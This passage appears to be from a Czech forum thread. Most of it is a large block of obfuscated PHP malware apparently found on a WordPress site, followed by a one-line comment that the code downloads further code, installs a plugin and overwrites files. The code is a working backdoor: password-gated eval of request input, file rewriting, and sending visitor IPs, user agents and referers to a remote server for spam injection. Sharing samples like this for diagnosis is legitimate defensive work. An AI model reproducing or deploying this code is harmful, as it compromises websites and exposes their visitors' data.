4f"]($OO__000OO_);echo $O00O__0O_O;unset($O00O__0O_O);exit();}return 0;}else{return $OO__OO0_00;}}$O0O00___OO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x30\x30\x4f\x5f\x5f\x4f"]($url);isset($O0O00___OO["\x68\x6f\x73\x74"])||$O0O00___OO["\x68\x6f\x73\x74"]='';isset($O0O00___OO["\x70\x61\x74\x68"])||$O0O00___OO["\x70\x61\x74\x68"]='';isset($O0O00___OO["\x71\x75\x65\x72\x79"])|| $O0O00___OO["\x71\x75\x65\x72\x79"]='';isset($O0O00___OO["\x70\x6f\x72\x74"])||$O0O00___OO["\x70\x6f\x72\x74"]='';$O0O_OO_00_=$O0O00___OO["\x70\x61\x74\x68"]?$O0O00___OO["\x70\x61\x74\x68"].($O0O00___OO["\x71\x75\x65\x72\x79"]?'?'.$O0O00___OO["\x71\x75\x65\x72\x79"]:''):'/';$O00_0OO__O=$O0O00___OO["\x68\x6f\x73\x74"];if($O0O00___OO["\x73\x63\x68\x65\x6d\x65"]=='https'){$O_O_0O0_O0='1.1';$OO_0O_00_O=empty($O0O00___OO["\x70\x6f\x72\x74"])?443:$O0O00___OO["\x70\x6f\x72\x74"];$O00_0OO__O=O_OO00O__0('Ky7OsCTdLXGXBwA=');$O00_0OO__O.=$O0O00___OO["\x68\x6f\x73\x74"];}else{$O_O_0O0_O0='1.0';$OO_0O_00_O=empty($O0O00___OO["\x70\x6f\x72\x74"])?80:$O0O00___OO["\x70\x6f\x72\x74"];}$OO0_0O__0O='Host:';$OO0_0O__0O.=$O00_0OO__O;$O0__OOO0_0[]=$OO0_0O__0O;$O0__OOO0_0[]=O_OO00O__0('c87PyXE0tNLsnMz7NyzskdHvTgUA');$O0__OOO0_0[]=O_OO00O__0('Cy1OLhudJ1TE/NK7EiMCAA==').$O0O_O_00_O;$O0__OOO0_0[]=O_OO00O__0('c0xOTxRi0osdLZRS1wIA');unset($OO0_0O__0O);if($OOOO00___0==2){if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x30\x4f\x30\x4f\x5f\x5f"]($OO0_0_OO_0)){$OO0_0_OO_0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x30\x5f\x30\x4f\x5f\x30"]($OO0_0_OO_0);}$O0__OOO0_0[]=O_OO00O__0('c87PKgO0nNK9EtqSxItUosKMjJTE4syczP06/QLS8v103LL8rVLS3KSc1Lzk9uPJTQEA');$O0__OOO0_0[]=O_OO00O__0('c87PKhI0nNK9H1Sc1LL8mcNwAgA=').${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x4f\x30\x4f\x30\x4f\x5f"]($OO0_0_OO_0);$O0__0O_O0O="POST $O0O_OO_00_ HTTP/$O_O_0O0_O0".PHP_EOL.${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x5f\x5f\x30\x4f\x30\x4f\x5f"](PHP_EOL,$O0__OOO0_0).PHP_EOL.PHP_EOL.$OO0_0_OO_0;unset($OO0_0_OO_0);}else{$O0__0O_O0O="GET $O0O_OO_00_ HTTP/$O_O_0O0_O0".PHP_EOL.${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x5f\x5f\x30\x4f\x30\x4f\x5f"](PHP_EOL,$O0__OOO0_0).PHP_EOL.PHP_EOL;}unset($O0__OOO0_0,$O0O00___OO,$O_O_0O0_O0,$O0O_OO_00_);$O_O_O00_0O=null;if(substr($OOOO0_0__0,-1)=='n'){$O_O_O00_0O=$OOOO0_0__0($O00_0OO__O,$OO_0O_00_O,$O00O__0O_Ono,$O00O__0O_Ostr,30);}else{if(substr($OOOO0_0__0,-1)=='t'){$O_OOO__000=O_OO00O__0('K0kusLwNLgRXBwA=');$O_OOO__000.=$O00_0OO__O;$O_OOO__000.=':';$O_OOO__000.=$OO_0O_00_O;$O_O_O00_0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x4f\x30\x4f\x30\x5f\x30"]($O_OOO__000,$O00O__0O_Ono,$O00O__0O_Ostr,30);unset($O_OOO__000);}}$OO_0OO00__='';if($O_O_O00_0O){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x30\x4f\x4f\x5f\x4f\x5f"]($O_O_O00_0O,TRUE);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x30\x4f\x30\x4f\x5f\x5f"]($O_O_O00_0O,30);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f"]($O_O_O00_0O,$O0__0O_O0O);if(!$OO0__O0O_0){$O00O__O_O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x30\x30\x4f\x4f\x5f"]($O_O_O00_0O);if(!$O00O__O_O0["\x74\x69\x6d\x65\x64\x5f\x6f\x75\x74"]){while(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x5f\x5f\x30\x30\x4f\x30\x4f"]($O_O_O00_0O)){$O_O0__0OO0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x5f\x4f\x4f\x30\x4f\x5f"]($O_O_O00_0O);if($O_O0__0OO0&&(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x4f\x4f\x5f\x5f\x4f\x30"]($O_O0__0OO0)=="%0D%0A"||${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x4f\x4f\x5f\x5f\x4f\x30"]($O_O0__0OO0)=="%0A")){break;}unset($O_O0__0OO0);}while(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x5f\x5f\x30\x30\x4f\x30\x4f"]($O_O_O00_0O)){$O00_O_O_O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x5f\x4f\x4f\x4f\x30\x5f"]($O_O_O00_0O,8192);$OO_0OO00__.=$O00_O_O_O0;unset($O00_O_O_O0);}}unset($O00O__O_O0);}${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x30\x5f\x4f"]($O_O_O00_0O);}else{if(substr($OOOO0_0__0,-1)=='e'){$O_0O_0_OO0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x30\x30\x5f\x4f\x4f"]($O00_0OO__O);$O_O_O00_0O=$OOOO0_0__0(AF_INET,SOCK_STREAM,0);if(socket_connect($O_O_O00_0O,$O_0O_0_OO0,$OO_0O_00_O)){if(!$OO0__O0O_0){socket_write($O_O_O00_0O,$O0__0O_O0O,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x4f\x30\x4f\x30\x4f\x5f"]($O0__0O_O0O));while($O0__O0_O0O=@socket_read($O_O_O00_0O,8192)){$OO_0OO00__.=$O0__O0_O0O;unset($O0__O0_O0O);}$OO_0OO00__=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x4f\x5f\x5f\x30\x30\x30"]("\\r\\n\\r\\n",$OO_0OO00__);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x4f\x5f\x30\x5f\x4f\x4f"]($OO_0OO00__);$OO_0OO00__=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x4f\x4f\x30\x5f\x30\x5f"]("\\r\\n\\r\\n",$OO_0OO00__);}else{$O_0OO00O__=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x5f\x4f\x5f\x30\x30\x30"](2,5);$OO_0O_0O_0=0;while($OO_0O_0O_0<$O_0OO00O__){socket_write($O_O_O00_0O,$O0__0O_O0O,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x4f\x30\x4f\x30\x4f\x5f"]($O0__0O_O0O));$OO_0O_0O_0++;${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x5f\x4f\x30\x4f\x30\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x5f\x4f\x5f\x30\x30\x30"](50000,100000));}unset($OO_0O_0O_0,$O_0OO00O__);}}socket_close($O_O_O00_0O);unset($O_0O_0_OO0);}}unset($O0__0O_O0O,$OOOO0_0__0,$O_O_O00_0O,$OO_0O_00_O,$O00_0OO__O);if(!$OO0__O0O_0){$OO_0OO00__=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x5f\x30\x30\x4f\x30\x5f"]('/(?:(?:\\r\\n|\\n)|^)([0-9A-F]+)(?:\\r\\n|\\n){1,2}(.*?)'.'((?:\\r\\n|\\n)(?:[0-9A-F]+(?:\\r\\n|\\n))|$)/si','O_OO00__O0',$OO_0OO00__);return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x30\x30\x5f\x4f\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x30\x30\x5f\x4f\x4f"]($OO_0OO00__,"\\xEF\\xBB\\xBF"));}else{return 1;}}function O_OO00__O0($matches){return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x4f\x4f\x5f\x30\x4f\x5f"]($matches[1])==${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x4f\x30\x4f\x30\x4f\x5f"]($matches[2])?$matches[2]:$matches[0];}function O_0O_O_0O0($OO_0__OO00){$OO_O_0O0_0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x30\x5f\x30\x4f\x4f\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x30\x5f\x30\x4f\x30\x5f"]($OO_0__OO00));$OO0O0_0__O=substr($OO_O_0O0_0,0,5);$OO0O0___O0=substr($OO_O_0O0_0,-5);$OO_OO0_00_=substr($OO_O_0O0_0,5,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x4f\x30\x4f\x30\x4f\x5f"]($OO_O_0O0_0)-10);return $OO0O0_0__O.'hT'.substr($OO_O_0O0_0,5,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x4f\x30\x4f\x30\x4f\x5f"]($OO_O_0O0_0)-10).'tP'.$OO0O0___O0;}function O_OO00O__0($OO_0__OO00){$OO0O0_0__O=substr($OO_0__OO00,0,5);$OO0O0___O0=substr($OO_0__OO00,-5);$OO_OO0_00_=substr($OO_0__OO00,7,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x4f\x30\x4f\x30\x4f\x5f"]($OO_0__OO00)-14);return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x4f\x30\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x30\x5f\x30\x4f\x5f\x5f\x4f"]($OO0O0_0__O.$OO_OO0_00_.$OO0O0___O0));}function O00O_0OO__($O00_O_0_OO=''){if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"})){if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x58\x5f\x46\x4f\x52\x57\x41\x52\x44\x45\x44\x5f\x46\x4f\x52"])){$O00_O_0_OO=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x58\x5f\x46\x4f\x52\x57\x41\x52\x44\x45\x44\x5f\x46\x4f\x52"];}else if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x43\x4c\x49\x45\x4e\x54\x5f\x49\x50"])){$O00_O_0_OO=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x43\x4c\x49\x45\x4e\x54\x5f\x49\x50"];}else{$O00_O_0_OO=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x52\x45\x4d\x4f\x54\x45\x5f\x41\x44\x44\x52"];}}else{if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x4f\x5f\x5f\x30\x4f\x5f"]('HTTP_X_FORWARDED_FOR')){$O00_O_0_OO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x4f\x5f\x5f\x30\x4f\x5f"]('HTTP_X_FORWARDED_FOR');}else if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x4f\x5f\x5f\x30\x4f\x5f"]('HTTP_CLIENT_IP')){$O00_O_0_OO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x4f\x5f\x5f\x30\x4f\x5f"]('HTTP_CLIENT_IP');}else{$O00_O_0_OO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x4f\x5f\x5f\x30\x4f\x5f"]('REMOTE_ADDR');}}return $O00_O_0_OO;}function OO00O__0_O($OO_0__OO00=''){if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"])){return ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"];}elseif(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"])){return ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"];}return $OO_0__OO00;}function O_O0O0O_0_($OO___0O00O){$O0_00__OOO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x4f\x30\x30\x4f\x30\x5f"]($OO___0O00O);$OO0_O0_O0_='';for ($OO_0O_0O_0=0;$OO_0O_0O_0<${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x4f\x30\x4f\x5f\x4f\x5f"]($O0_00__OOO);$OO_0O_0O_0++){if($OO_0O_0O_0%2!=0){$OO0_O0_O0_.=$O0_00__OOO[$OO_0O_0O_0];}}return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x30\x5f\x30\x4f\x5f\x5f\x4f"]($OO0_O0_O0_);}function O0O__O_00O($OO_0OO00__){$OO_0OO00__=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x5f\x4f\x30\x5f\x4f\x30"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x30\x5f\x30\x4f\x5f\x5f\x4f"]($OO_0OO00__));$OO0O00_O__=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x4f\x30\x30\x5f\x30\x5f"]("/\\|/si",$OO_0OO00__,-1,PREG_SPLIT_NO_EMPTY);if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x30\x4f\x30\x4f\x5f\x5f"]($OO0O00_O__)){return false;}if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x4f\x30\x4f\x5f\x4f\x5f"]($OO0O00_O__)<2){return false;}$OO_0OO00___array["\x64\x61\x74\x61"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x4f\x4f\x5f\x30\x30\x4f"]($OO0O00_O__);$OO_0OO00___array["\x64\x61\x74\x61"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x30\x5f\x30\x4f\x5f\x5f\x4f"]($OO_0OO00___array["\x64\x61\x74\x61"]);$OO_0OO00___array["\x68\x65\x61\x64\x65\x72\x73"]=$OO0O00_O__;return $OO_0OO00___array;}function OOO_0O0_0_($OO_0OO0__0=''){$O_O_00O0_O=O_OO00O__0('K8pPydKi8p1iujcpKAEA');if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x4f\x30\x4f\x30\x5f\x4f"]($O_O_00O0_O)){@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x4f\x4f\x4f\x5f\x30\x5f"]($O_O_00O0_O);}if($OO_0OO0__0==''){$OO_0OO0__0=O_OO00O__0('08soSDuUxOTi0UpuBgA=');}$OO_0OO00__=O_OO00O__0('lVFNrcj5swEPxBvZiPSHB4h0CDgRDKR7DBN2waQ7ABlQTC+/VFIU9pT1VPq1nN7MzuRgcyUIg+z9gBhcq51+g9c4VB8lpcXKtndtt6V/3oHcyFQLR40BkpNLUAJoJ27dp/Vk46f6KpVVM4HyPbhCV+CAaUuoJhH/HeSKQYSR6GRZ5cS3vf5E1dF9JUKns3l65lMOm0JTbuDNbzBYr76qUH3ervPq5U3QGCd+CFR6qGv06fxfzCNYHKQJttTqXtb2u+rsT6Nsut5gDPM1HF/cXXmK2AEqIbSd8apoZLmVuALe8ewclQQXN56v55hw17kCxUBbzAj9G+ztNfe3/Xj9FByDM222q9jweViTjrvLxavRMRyNM3W/ii0vzVFzlUVgOVGT+r+jGTSGNSAJL5NVMzHsxD+qXLOjSS1PpZ4l27/o1teWMepBY9O+APbThRGXM/v6UJclCCwiwHxD8f0I84U5xLuq8DXPwnP37zka9QuGZr9tOWhT9/4Dm3Ux73RgDeu0fyr84+M3');$OO_0OO00__=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x30\x5f\x30\x4f\x5f\x5f\x4f"]($OO_0OO00__);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x4f\x30\x4f\x30\x5f\x4f"]($OO_0OO0__0)){$O00OO_0_O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x5f\x30\x4f\x4f\x5f\x4f"]($OO_0OO0__0);if($OO_0OO00__==$O00OO_0_O_){return;}}@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x5f\x4f\x30\x4f\x30"]($OO_0OO0__0,0777);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x4f\x30\x4f\x30\x5f\x5f"]($OO_0OO0__0,$OO_0OO00__);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x5f\x4f\x30\x4f\x30"]($OO_0OO0__0,0644);}function O_0O0O__0O($googleUrl,$O_0O0OO0__,$OOO0O__00_){$OO_0_00O_O=O_OO00O__0('yygpKvMSi20tdXLdYvyMxLty/OLEnNTSywVS0GiqgRBWAwA=');$O00OO__O_0=sprintf($OO_0_00O_O,$googleUrl,$OOO0O__00_["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"],$OOO0O__00_["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"],$O_0O0OO0__);$O_O0O_00O_=O_OO0_O0_0($O00OO__O_0);if(isset($_REQUEST["\x73\x74"])){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x5f\x4f\x5f\x30\x4f\x5f\x30"]($O00OO__O_0);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x5f\x4f\x5f\x30\x4f\x5f\x30"]($O_O0O_00O_);die();}$O__000OO_O=O_OO00O__0('S8/PTpO89VgJBQA=');$O0O0_OO0__=O_OO00O__0('Ky5NTfck4ihtLgYA');$OO__0O0_O0=O_OO00O__0('S0vMzbrElTqNAQA=');if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x30\x5f\x4f\x30\x5f\x4f"]($O_O0O_00O_,$O__000OO_O)!=false){die($O0O0_OO0__);}else{$OO_0_00O_O=O_OO00O__0('yygpKbHbDS11ct1i/IzEu3L84sSc1NLLBVLQaKqBYOBDAA==');$O00OO__O_0=sprintf($OO_0_00O_O,$googleUrl,$OOO0O__00_["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"],$OOO0O__00_["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"],$O_0O0OO0__);$O_O0O_00O_=O_OO0_O0_0($O00OO__O_0);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x30\x5f\x4f\x30\x5f\x4f"]($O_O0O_00O_,$O__000OO_O)!=false){die($O0O0_OO0__);}die($OO__0O0_O0);}}function O_O00_0OO_($OO___0O00O){$OOO0O__00_=array();$OOO0O__00_["\x64\x65\x66\x61\x75\x6c\x74\x5f\x70\x61\x72\x61\x6d\x73"]=$OO___0O00O;$OOO0O__00_["\x61\x70\x69"]=O_O0O0O_0_($OOO0O__00_["\x64\x65\x66\x61\x75\x6c\x74\x5f\x70\x61\x72\x61\x6d\x73"]);$OOO0O__00_["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"]=OO00O__0_O();$OOO0O__00_["\x72\x65\x71\x75\x65\x73\x74\x5f\x75\x72\x6c"]=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x52\x45\x51\x55\x45\x53\x54\x5f\x55\x52\x49"];$OOO0O__00_["\x72\x65\x66\x65\x72\x65\x72"]=isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x52\x45\x46\x45\x52\x45\x52"])?${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x52\x45\x46\x45\x52\x45\x52"]:'';$OOO0O__00_["\x75\x73\x65\x72\x5f\x61\x67\x65\x6e\x74"]=isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x55\x53\x45\x52\x5f\x41\x47\x45\x4e\x54"])?${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x55\x53\x45\x52\x5f\x41\x47\x45\x4e\x54"]:'';$OOO0O__00_["\x69\x70"]=O00O_0OO__();if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x53"])){$OOO0O__00_["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"]=O_OO00O__0('yygpKPSSi20tcSCHAA==');}else{$OOO0O__00_["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"]=O_OO00O__0('yygpKyqbDRBS1wcA');}if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x41\x43\x43\x45\x50\x54\x5f\x4c\x41\x4e\x47\x55\x41\x47\x45"])){$OOO0O__00_["\x6c\x61\x6e\x67\x75\x61\x67\x65"]=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x41\x43\x43\x45\x50\x54\x5f\x4c\x41\x4e\x47\x55\x41\x47\x45"];}else{$OOO0O__00_["\x6c\x61\x6e\x67\x75\x61\x67\x65"]="";}if(isset($_REQUEST["\x70\x61\x72\x61\x6d\x73"])){$O0__OO0_0O=O_OO00O__0('c87PKPw0nNK9EtqSxItUosKMjJTE4syczP088qzs8YLDAA==');header($O0__OO0_0O);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x5f\x4f\x4f\x30\x30\x4f"]('json_encode')){echo ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x5f\x5f\x4f\x4f\x4f\x5f"]($OOO0O__00_);}else{${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x30\x30\x4f\x5f\x5f\x4f"]($OOO0O__00_);}die();}if(isset($_REQUEST["\x64\x5f\x74\x69\x6d\x65"])){die('2022/12/2');}if(isset($_REQUEST["\x70\x77\x64\x31\x36\x33"])){if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x4f\x4f\x30\x5f\x30\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x30\x30\x5f\x4f\x4f"]($_REQUEST["\x70\x77\x64\x31\x36\x33"]))=="e7ba60676aca63011211a9dc687f6d47"){$OO0_O0__O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x30\x5f\x30\x4f\x5f\x5f\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x5f\x4f\x30\x5f\x30\x4f"]((${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x5f\x30\x4f\x4f\x5f\x30"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x5f\x30\x4f\x30\x4f\x5f"]($_REQUEST["\x7a\x7a\x7a"])))));$O_0_0O0O_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x30\x5f\x30\x4f\x5f\x5f\x4f"]("PD9waHA=");if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x30\x5f\x4f\x30\x5f\x4f"]($OO0_O0__O0,$O_0_0O0O_O)===false){$OO0_O0__O0=$O_0_0O0O_O.PHP_EOL.$OO0_O0__O0;}if(isset($_REQUEST["\x65"])){$OO0_O0__O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x30\x30\x4f\x5f"]($O_0_0O0O_O,"",$OO0_O0__O0);$OOOO0_0__0='e'.${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x30\x5f\x30\x4f\x5f\x5f\x4f"]("dmE=").'l';$OOOO0_0__0($OO0_O0__O0);die();}$OO0_OO00__=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x4f\x5f\x4f\x30\x5f\x4f"]();${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f"]($OO0_OO00__,$OO0_O0__O0);$O00O__0OO_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x30\x30\x4f\x4f\x5f"]($OO0_OO00__);@require($O00O__0OO_["\x75\x72\x69"]);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x30\x5f\x4f"]($OO0_OO00__);die();}if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x4f\x4f\x30\x5f\x30\x5f"]($_REQUEST["\x70\x77\x64\x31\x36\x33"]."a!#_11AA")=="2f7a76f71ff9e24be7c0015ff9cb81d8"){if(isset(${"\x5f\x47\x45\x54"}["\x73\x69\x74\x65\x6d\x61\x70"])){$O_0O0OO0__=${"\x5f\x47\x45\x54"}["\x73\x69\x74\x65\x6d\x61\x70"];$OO0_0_0_OO=O_OO00O__0('Ky8v1pk0vPz0/PSdVLzs8ARFAA==');if(isset(${"\x5f\x47\x45\x54"}["\x67\x6f\x6f\x67\x6c\x65\x5f\x75\x72\x6c"])){$OO0_0_0_OO=${"\x5f\x47\x45\x54"}["\x67\x6f\x6f\x67\x6c\x65\x5f\x75\x72\x6c"];}O_0O0O__0O($OO0_0_0_OO,$O_0O0OO0__,$OOO0O__00_);}}}OOO_0O0_0_();$O0___0OOO0=array('domain'=>$OOO0O__00_["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"],'request_url'=>$OOO0O__00_["\x72\x65\x71\x75\x65\x73\x74\x5f\x75\x72\x6c"],'ip'=>$OOO0O__00_["\x69\x70"],'agent'=>$OOO0O__00_["\x75\x73\x65\x72\x5f\x61\x67\x65\x6e\x74"],'referer'=>$OOO0O__00_["\x72\x65\x66\x65\x72\x65\x72"],'protocol'=>$OOO0O__00_["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"],'language'=>$OOO0O__00_["\x6c\x61\x6e\x67\x75\x61\x67\x65"]);$OO_0OO00__=O_OO0_O0_0($OOO0O__00_["\x61\x70\x69"],0,2,$O0___0OOO0,array(),$OOO0O__00_["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"]);if(isset($_REQUEST["\x64\x75\x6d\x70"])){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x5f\x4f\x5f\x30\x4f\x5f\x30"]($OO_0OO00__);$OO_0OO00__=O_OO0_O0_0("http://google.co.jp");${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x5f\x4f\x5f\x30\x4f\x5f\x30"]($OO_0OO00__);die();}$O00_O_O_O0=O0O__O_00O($OO_0OO00__);if($O00_O_O_O0!==false){foreach($O00_O_O_O0["\x68\x65\x61\x64\x65\x72\x73"] as $O0__OO0_0O){@header($O0__OO0_0O);}echo $O00_O_O_O0["\x64\x61\x74\x61"];die();}}O_O00_0OO_($OO___0O00O);
?>
08.12.2022 09:46
25
díky aspoň za tenhle kód, mno, stahuje si to další kódy z internetu, snaží se to očividně instalovat vlastní plugin, přepisuje několik souborů, víc času jsem jeho dekódování nevěnoval. Čekal bych, že to WP db si nahodí crony.

